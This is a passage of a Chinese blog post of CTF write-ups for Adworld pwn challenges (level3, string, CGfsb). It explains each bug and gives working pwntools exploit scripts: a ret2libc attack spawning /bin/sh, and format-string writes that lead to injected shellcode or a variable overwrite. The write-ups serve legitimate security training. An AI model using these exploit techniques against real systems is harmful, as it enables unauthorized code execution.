+ p32(<span class="number">1</span>) + p32(write_got) + p32(<span class="number">4</span>)</span><br><span class="line">r.sendafter(<span class="string">"put:\n"</span>, payload)</span><br><span class="line">write_addr = u32(r.recv(<span class="number">4</span>))</span><br><span class="line">log.success(<span class="string">"write_addr: "</span> + str(hex(write_addr)))</span><br><span class="line"></span><br><span class="line">libc_base = write_addr - libc.symbols[<span class="string">"write"</span>]</span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">"system"</span>]</span><br><span class="line">bin_sh_addr = libc_base + libc.search(<span class="string">"/bin/sh"</span>).next()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x8C</span> + p32(system_addr) + p32(<span class="number">1</span>) + p32(bin_sh_addr)</span><br><span class="line">r.sendafter(<span class="string">"put:\n"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="get-shell"><a href="#get-shell" class="headerlink" title="get_shell"></a>get_shell</h2><p>直接给shell，略。  </p>
<h2 id="string"><a href="#string" class="headerlink" title="string"></a>string</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200501135353.png" alt><br>sub_400996打印一个龙，然后申请了一块内存给v3，v4=v3，v3[0]=68，v3[1]=85，然后把地址打印出来，跟入sub_400D72(v4)。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200501135916.png" alt><br>没什么可利用的，name小于12就行。sub_400A7D里是简单的判断，就不贴了。<br>看sub_400BB9。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200501140321.png" alt><br>有一处格式化字符串漏洞。提示v2是输入一个地址，并且v2紧邻format，可导致任意内存写入。再看sub_400CA6。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200501140724.png" alt><br>if是判断a1[0]=al[1]，然后mmap看了一下是映射内存，比如可将磁盘文件内容映射到内存里。但是这里的fd位用了-1，就是一个匿名映射。也不太了解干嘛的，但不管映射什么，都是拿到了一块内存。这里就拿到了一块0x1000的内存，然后read0x100，让我们写内存，然后转为函数指针去调用。很明显我们可以写shellcode进去。然后回溯一下a1就是最开始申请的v3。<br>思路就很清晰，首先通过打印得到v3地址，利用fmt漏洞将v3[0]写成85，然后就可以写shellcode了。<br>这里要确定一下输入的v3地址的偏移是多少。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"string"</span>)</span><br><span class="line"><span class="comment">#context(log_level="debug", arch="amd64", os="linux")</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"secret[0] is "</span>)</span><br><span class="line">secret_addr = int(r.recv(<span class="number">7</span>),<span class="number">16</span>)</span><br><span class="line">log.info(hex(secret_addr))</span><br><span class="line">r.sendlineafter(<span class="string">"character's name be:\n"</span>, <span class="string">"sncker"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"east or up?:\n"</span>, <span class="string">"east"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"leave(0)?:\n"</span>, <span class="string">"1"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"'Give me an address'\n"</span>, str(secret_addr))</span><br><span class="line">payload = <span class="string">"aaaa"</span> + <span class="string">".%x"</span>*<span class="number">10</span></span><br><span class="line">r.sendlineafter(<span class="string">"you wish is:\n"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/sncker/resource/raw/master/image/20200501142119.png" alt><br>可以看到我们输入的地址相当于格式化字符串的第7个参数。就可以用%85c%7$n将v3[0]写成85了。<br>shellcode用shellcraft生成的就可以了，注意要声明64位。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"string"</span>)</span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"amd64"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"secret[0] is "</span>)</span><br><span class="line">secret_addr = int(r.recv(<span class="number">7</span>),<span class="number">16</span>)</span><br><span class="line">log.info(hex(secret_addr))</span><br><span class="line">r.sendlineafter(<span class="string">"character's name be:\n"</span>, <span class="string">"sncker"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"east or up?:\n"</span>, <span class="string">"east"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"leave(0)?:\n"</span>, <span class="string">"1"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"'Give me an address'\n"</span>, str(secret_addr))</span><br><span class="line"><span class="comment">#payload = "aaaa" + ".%x"*10</span></span><br><span class="line">payload = <span class="string">"%85c%7$n"</span></span><br><span class="line">r.sendlineafter(<span class="string">"you wish is:\n"</span>, payload)</span><br><span class="line">r.sendlineafter(<span class="string">"USE YOU SPELL"</span>, asm(shellcraft.sh()))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="CGfsb"><a href="#CGfsb" class="headerlink" title="CGfsb"></a>CGfsb</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200501142622.png" alt><br>这题也是利用fmt写内存。将pwnme覆写成8就可以了。pwnme是全局变量可以拿到地址。然后就是确定一下偏移。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200501143254.png" alt><br>输入的字符串相当于第10个格式化参数。<br>然后p32(pwnme)刚好是4字节小于8所以可以把地址写在前面。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"CGfsb"</span>)</span><br><span class="line">context(log_level=<span class="string">"debug"</span>, os=<span class="string">"linux"</span>, arch=<span class="string">"i386"</span>)</span><br><span class="line">pwnme = <span class="number">0x0804A068</span></span><br><span class="line">r.sendlineafter(<span class="string">"name:"</span>, <span class="string">"sncker"</span>)</span><br><span class="line">payload = p32(pwnme) + <span class="string">"%4c%10$n"</span>  <span class="comment">#pwnme地址4字节再用%4c补齐8个字符</span></span><br><span class="line">r.sendlineafter(<span class="string">"please:"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/blog/tags/攻防世界/" rel="tag"># 攻防世界</a>
              <a href="/blog/tags/Adworld/" rel="tag"># Adworld</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/blog/2020/03/05/BugkuCTF-WriteUp/" rel="prev" title="BugkuCTF-WriteUp">
      <i class="fa fa-chevron-left"></i> BugkuCTF-WriteUp
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn"><span class="nav-number">1.</span> <span class="nav-text">pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#level2"><span class="nav-number">1.1.</span> <span class="nav-text">level2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#guess-num"><span class="nav-number">1.2.</span> <span class="nav-text">guess_num</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#int-overflow"><span class="nav-number">1.3.</span> <span class="nav-text">int_overflow</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cgpwn2"><span class="nav-number">1.4.</span> <span class="nav-text">cgpwn2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#when-did-you-born"><span class="nav-number">1.5.</span> <span class="nav-text">when_did_you_born</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hello-pwn"><span class="nav-number">1.6.</span> <span class="nav-text">hello_pwn</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level0"><span class="nav-number">1.7.</span> <span class="nav-text">level0</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level3"><span class="nav-number">1.8.</span> <span class="nav-text">level3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#get-shell"><span class="nav-number">1.9.</span> <span class="nav-text">get_shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#string"><span class="nav-number">1.10.</span> <span class="nav-text">string</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CGfsb"><span class="nav-number">1.11.</span> <span class="nav-text">CGfsb</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="SNCKER"
      src="http://q1.qlogo.cn/g?b=qq&nk=948375961&s=640">
  <p class="site-author-name" itemprop="name">SNCKER</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/blog/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/blog/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SNCKER</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/blog/lib/anime.min.js"></script>
  <script src="/blog/lib/velocity/velocity.min.js"></script>
  <script src="/blog/lib/velocity/velocity.ui.min.js"></script>
<script src="/blog/js/utils.js"></script><script src="/blog/js/motion.js"></script>
<script src="/blog/js/schemes/pisces.js"></script>
<script src="/blog/js/next-boot.js"></script>



  















  

  

  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/blog/js/love.js"></script>
</body>
</html>
